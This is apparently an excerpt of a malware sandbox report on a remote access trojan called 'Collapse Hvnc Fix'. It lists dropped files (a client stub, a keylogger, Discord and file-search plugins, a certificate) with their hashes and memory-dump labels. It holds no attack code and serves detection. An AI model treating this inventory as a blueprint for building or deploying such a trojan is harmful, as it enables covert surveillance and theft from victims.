| SHA512 | bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe.config
| MD5 | b8b7f83b3291d497e37b8117a59facf1 |
| SHA1 | 677353bfafdcb73f194826f99b1450aa343ed40f |
| SHA256 | a3ff6fdc656bb0a36df5e3da671cc649dc57a38cd8b9b0063c547bfd58b0c650 |
| SHA512 | 87176764801f63b6102d0981f2e08b5f5cd5ba3c030196a25293cc9ee681acc8175adc6880248f579b91e28f503e6a237e94bd2c0cbef5d3ca44f692dddf7427 |
memory/2844-281-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp
memory/2844-282-0x0000029A22CE0000-0x0000029A24506000-memory.dmp
memory/2844-283-0x0000029A26090000-0x0000029A260A2000-memory.dmp
memory/2844-284-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Siticone.Desktop.UI.dll
| MD5 | 1582aa45d981e0e569c6e05698642b30 |
| SHA1 | 763506f312a186c55a04ef6a16ad7e867c394097 |
| SHA256 | 21eecaf504b7fe787a45f4aa8f8f36dacfc3ab1d75624dfb41827cdef2a9a589 |
| SHA512 | 278a7a4e2b9d82528200b9f92244db3f228187d15c36fd169deb927e343bc4d0bb29c9dba496f86558aea4f4deb44d1e47a41d5598c0b375d99ad9fbe99cec34 |
memory/2844-286-0x0000029A3F150000-0x0000029A3F556000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Guna.UI2.dll
| MD5 | 1915011997fdb9aa95f15e567f4e6070 |
| SHA1 | 40a7853f14d6d4919279965f026d57cf9a104998 |
| SHA256 | 952fa59d3d6d8c8c5fad8a1144e5effdf0fa92d58db1fb2a2899faf84c6273ab |
| SHA512 | 5cca71b42ed9dc154e6d5919e7cd93046168781a55c051818157848efc918b2e4dd92f422eb1c47e0940b645ba750facf83bce240748a8170ac8ce0afc9efa90 |
memory/2844-288-0x0000029A3EF40000-0x0000029A3F136000-memory.dmp
memory/2844-289-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-290-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-291-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-292-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp
memory/2844-293-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-294-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-295-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-296-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-297-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-298-0x0000029A3EBE0000-0x0000029A3EC1C000-memory.dmp
memory/2844-300-0x0000029A40D60000-0x0000029A40FB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\cGeoIp.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
memory/2844-303-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\ServerCertificate.p12
| MD5 | 6ce85262afbc028314bdf6fe9aa718a5 |
| SHA1 | b59fe71c2ebd80df9e3ba5681ff6e36c90c2f0a8 |
| SHA256 | 74eba079b36c835cd89af395cf53272c53351cd851efb140a8152410c4e2973e |
| SHA512 | 8ac1198de48c3acab03482958ccd5044561599373338f0bb9ff203c0d596b810143d420ebdcb20abd60a1383a08e70f7ddac6fa9b304a0a3a61aa06af030e6fb |
memory/2844-309-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-310-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
memory/2844-311-0x0000029A3EB90000-0x0000029A3EBA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\dnlib.dll
| MD5 | 5cc2bb48b5e8c8ac0b99669401d15456 |
| SHA1 | 02e9ae08f3ec364834eb3ffc122f1c90e1b0e95e |
| SHA256 | 648950f725fb0320e09c52dcaf81764916df96dc62e7429ba67daea0acb784ea |
| SHA512 | 2867e94cee9f89f1cf85ad01083d75f4bc0bc0e551b2ffae05581828994f2b01a458ac7a7c94a45e8c40858ecce197f7ec23482ee13ef3f1bf82b33b89b3b420 |
memory/2844-314-0x000002A245070000-0x000002A245194000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Stub\Client.exe
| MD5 | f5c75c1d8cdb213c46d6cb1e50178ac2 |
| SHA1 | 7a60f6aca8b06c46518d26ae9f7c321f312816a7 |
| SHA256 | ff1593d664038b0c727f5a4772980f3dee659d315bbbf1b62b27c12696b42109 |
| SHA512 | 0d602f4e9fbda3c9e219cf507917bae9527581d8d341d20523b3dcc756d9b2244485937bac793a16489fec4d22a618249009a515ed63ad1e25fd87308fbf3698 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Keylogger.exe
| MD5 | b8607b7921cd9cba78058fcb56bcfb9d |
| SHA1 | 1344f12ff7e23122b62fcc7f3be548c73d3c3efd |
| SHA256 | b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c |
| SHA512 | dd36040e57f2744437684e257caac0987a90deac0a60536f1cb8d690e256505d427931a3beb8d58f87c2c1bf5beb0a40c4b09417c451a07e5856044efbac1449 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\DevExpress.WinRTPresenter.Launcher.exe
| MD5 | de4449ac523ac31f66efe7f090360f71 |
| SHA1 | de7fcb8c16c7cab8255b8e31781efb0ffc45acce |
| SHA256 | 76a868948e5b4df73f5dab5606135f6bf10b598bdaa991737224edcb8fdd58db |
| SHA512 | d43021c5878f08c38264e1882313959aa51b8dabf6649a64f476f3e7c0ba7fdaaac0f3edaa6fb3ea2e56889a5e78791236c1dfe8dbcd9218d7eab30a9ee4a56c |
C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config
| MD5 | 416afa3ab63684bfbb2fc0d627741358 |
| SHA1 | 9a9daaf75cc63cabb33cdf9a21d2c55e72dfffef |
| SHA256 | ae9bbbf6afc70f293f51fe103f9e8f65d5146eec86a20f3b746611549a065138 |
| SHA512 | 742f19b3cb870c6e819449a285344358c3698d26519c2d151a24d1c13ce90cb5a452cb0b399969ce63546da3d0f5d5e012cc19ff9bc0ba0396f310c748ffe4d0 |
C:\Users\Admin\AppData\Local\Collapse_RAT\Collapse.exe_Url_sbcnndr00mvtocpxr2tquumt2yizqsdq\1.5.0.0\user.config
| MD5 | 9f7263447a7147f27794207b622e7bed |
| SHA1 | fb237d0308cd229b53ebdd1fac800c2d2e8eb0fb |
| SHA256 | 630731e94e34a01060cca637ea1bac6bec99bb7eaa4d747910e6cc166890149e |
| SHA512 | a4e8f23db0c73e198e127cdff38507b4173701b99fdfc6bb3af62f398247d368c8208ac9177f710709d0692a47d4f96239e494054244a5373ce4395dfc63ea48 |
C:\Users\Admin\Desktop\Client.exe
| MD5 | 806c4a1e3eb79086789467aba1721627 |
| SHA1 | 6fd6541ac570c661f538c505180925c71cc29642 |
| SHA256 | f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928 |
| SHA512 | 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0 |
C:\Users\Admin\Desktop\Client.exe
| MD5 | 806c4a1e3eb79086789467aba1721627 |
| SHA1 | 6fd6541ac570c661f538c505180925c71cc29642 |
| SHA256 | f236915f94b0cd07caf0b94c38a977c57d5eafc24a36895f91d74fb63d44f928 |
| SHA512 | 57d234990fd1e93fcd0dbc0cb11b1c02d48067326626b9a84d0e135986d9503397133d6180436a55b9948e4a34d4553ba5575d8a2a83636813d6ddea4cc1d6b0 |
memory/1152-336-0x0000000000C50000-0x0000000000C66000-memory.dmp
memory/1152-337-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp
memory/1152-338-0x000000001B900000-0x000000001B910000-memory.dmp
memory/2844-340-0x0000029A41320000-0x0000029A4132A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\IP2Region.dll
| MD5 | cd5a0b0d309fd5837ddacbf4c1a65cda |
| SHA1 | 65fbc931f4ba8c5e3b26719665ee9ea6015f402c |
| SHA256 | b0c2a6951dae794c210fbe68d7f42081e5da0f7cbb926cf986c3d453f9920f37 |
| SHA512 | 84e4e1aa3f6c3014b39b0ac0da3db41e086dfab4e7d38a154f0ff2d0c65bae87039175e54cf950a57f21f5c56c19a62d6f98b2143f14a21d743867a2b37243aa |
memory/1152-344-0x00007FFA9A2D0000-0x00007FFA9AD91000-memory.dmp
memory/1152-345-0x000000001B900000-0x000000001B910000-memory.dmp
memory/2844-348-0x000002A244B60000-0x000002A244C60000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Fun.dll
| MD5 | 6498fbaa8d0f46e9cc7eb5350db0d226 |
| SHA1 | 2b6502e636cf3a307fdd9417c33215e95fe133ce |
| SHA256 | 1aacbe29bc2ba2fa3b23e632ba4d0f31b21d9b7517230af75b943eed06e42c10 |
| SHA512 | 3df2476cff49da2e322693ff5751d8cbbbffa03e063e9a74b3141e95f99e03a6ddc84d4ded4d2bd28937135e73615f6b9d810741a864d196c7aab4089d744c6e |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Discord.dll
| MD5 | 7a9892f86badfa7560fd9182a775fb73 |
| SHA1 | 4ac58c122bdf7ad51e3ba8ff6151b545a258ec34 |
| SHA256 | 84c4a1f90507955ce9ff3e8c260bbacdb57b4d230853d2fe1379fdbc98938c7b |
| SHA512 | 6b646d83011444972c8b9b38f886035d4bef498d40299ebc3f80da1fc7b3d3b02fbdff1fb355574059f1a6309ebaeeba7aa8f7aa26c99b7452bcaa1ad04259ec |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileSearcher.dll
| MD5 | 965f3d108d5995ba6214b32ce416d669 |
| SHA1 | 3c2c219e053b3a692e37a59cd28db702da2af8d9 |
| SHA256 | 05ee33a9f85545c43fbab3443751cdd0b151147f4665cfd3a661bae610b8e6b0 |
| SHA512 | f6d041219f5f5f1ee270812e5b4565465ce7c245636661d296a4dbd93b672bf1c3eaff890f84766c8f6b81ca14d5680e9bf8ed0c8a470018733c38dcb3897753 |
memory/1152-355-0x000000001DBA0000-0x000000001DC16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\FileManager.dll
| MD5 | 5d429feae7e6513205802ccdd0012a90 |
| SHA1 | 0262c5caa56e33af56ac1e2799bfe9fd5f4f5977 |
| SHA256 | b2417948b649d6575597e82c87903a83b0d575776180b5aa3f4c2fb03504b488 |
| SHA512 | db865c7262330818682e3d6a011e07ff6b79c70ba3507e1206cbf2b88b9d9e4bbf888384b71ce27993296c21f2a883aa8de6f435aaf9a7a8a6e8a2c80720b468 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Extra.dll
| MD5 | f5bf218ad015cae03530be7c8f0868a9 |
| SHA1 | d47c3936fded28dd4330f1aac7881d8bb17a1d02 |
| SHA256 | 42b16d214b9336027c3e854c119739fac4cceac6e91045f69d1db18144b538bd |
| SHA512 | a6c5a0cf8834de88b8df202c94de30521af3e7f8edfa213e896dac1c03096faa128fa38555bd9683d3d5819cdd34572f7cf061b9f841b823e13db9325cb5f090 |
memory/1152-356-0x000000001BDB0000-0x000000001BDBE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Plugins\Audio.dll
| MD5 | c16fccda2cdcf374df662c8035ed287c |
| SHA1 | ed32b20dde3c884d80eab36a7096fbcb9432fbeb |
| SHA256 | 158e664b0976c0ae9594d7f57ff44ba298ca50dcf43fcdb76df5ff1893537800 |
| SHA512 | 50a8b94b4089f59113a92033f685aa8037131d96423d412b53326a1c9f46529654e0776858977aae1448b4be3b16cd83c9eda5cf5352464a156f2343ff7c5480 |
memory/1152-357-0x000000001DB20000-0x000000001DB3E000-memory.dmp
memory/2844-358-0x000002A244B60000-0x000002A244C60000-memory.dmp